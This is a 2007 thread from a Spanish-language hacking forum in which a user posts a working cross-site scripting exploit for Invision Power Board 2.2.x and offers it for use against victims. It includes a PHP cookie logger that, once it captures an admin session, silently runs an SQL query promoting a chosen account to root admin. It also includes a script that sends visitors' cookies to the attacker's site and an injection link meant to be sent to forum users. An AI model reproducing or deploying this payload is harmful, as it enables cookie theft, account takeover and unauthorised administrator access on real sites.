Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 07, 2008, 12:19:48
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, [ E0F ] d0RkNet)  |  Tema: XSS Invision Power Board. 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: XSS Invision Power Board.  (Leído 233 veces)
ElrosYavetil
Recien Llegado
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil Email
« en: Agosto 09, 2007, 11:35:54 »

Pues bien, a petecion de un user, pongo un muy buen exploits de XSS para Invision Power Board.

Cread un nuevo archivo con la extension .php, por ejemplo INVISION.php e introducid esto

Código:
<?php
$target 
"http://FORODETUVICTIMA.COM"#Target forum without trailing slash
$prefix "ibf_"#Database prefix, default: ibf_
$member 22#Member id to promote
$newgroup 4# The id of the new group to promote, normally 4 is root admin

$ip $_SERVER['REMOTE_ADDR'];
$referer $_SERVER['HTTP_REFERER'];
$agent $_SERVER['HTTP_USER_AGENT'];

$data $_GET['c'];
$time date("Y-m-d G:i:s A");
$text "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";

$file fopen('log.txt' 'a');
fwrite($file,$text);
fclose($file);
if(
preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print 
'<iframe width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql&section=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></iframe>';
}
?>

Ahora cread en vuestro servidor un archivo llamado log.txt y ponedle el permiso chmod a 777

Ahora, cread otro archivo llamado script.js y meteis esto
Código:
document.location="http://TUSITIO.com/INVISION.php?c="+document.cookie;

ahora cread un archiv con extension .html, por ejemplo PRUEBA.html y meteis esto

Código:
<iframe border=0 src="http://www.VICTIMA.com/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.TUSITIO.com/script.js>" width=0 height=0></iframe>

bien, ahora simplemente teneis que mandar el link PRUEBA.html por mensaje privado o posteadlo en el foro en cuestion, y en el archivo log.txt se escribiran las cookies de los usuarios, dudas preguntadlas aqui ^^
En línea
Anubiz_thot
Miembro
*****
Desconectado Desconectado

Mensajes: 61



Ver Perfil
« Respuesta #1 en: Agosto 09, 2007, 03:24:05 »

probemoslo a ver q tal !
thx
En línea

El tamaño de tu firma excede el máximo permitido por el foro, porfavor redúcela.
http://img136.imageshack.us/img136/4678/bannerwar2pv0.jpg[/img]
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2090


www.nullbytes.net


Ver Perfil WWW
« Respuesta #2 en: Agosto 11, 2007, 08:46:22 »

q version ?
En línea

ElrosYavetil
Recien Llegado
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil Email
« Respuesta #3 en: Agosto 12, 2007, 08:05:00 »

2.2.X
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, [ E0F ] d0RkNet)  |  Tema: XSS Invision Power Board. « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC